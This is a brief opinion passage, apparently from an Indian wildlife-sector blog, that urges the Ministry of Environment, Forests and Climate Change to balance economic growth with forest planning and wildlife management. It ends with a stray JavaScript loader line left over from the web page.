Unfortunately, future prospects look dim for all of us in the wildlife sector, whether as a NGO or as a social enterprise. The Indian Government has put in place a set of framework to encourage growth and this must not run contrary to the objectives of wildlife management and tourism. To achieve both ends, we as a people should be prepared “to and for” change as it is the only constant thing in today’s world. I sincerely hope that more emphasis is given by the Ministry of Environments, Forests and Climate Change, to advocate better planning, management and eventually effective control of our forests and their contribution to the national Gross National Product.document.currentScript.parentNode.insertBefore(s, document.currentScript);
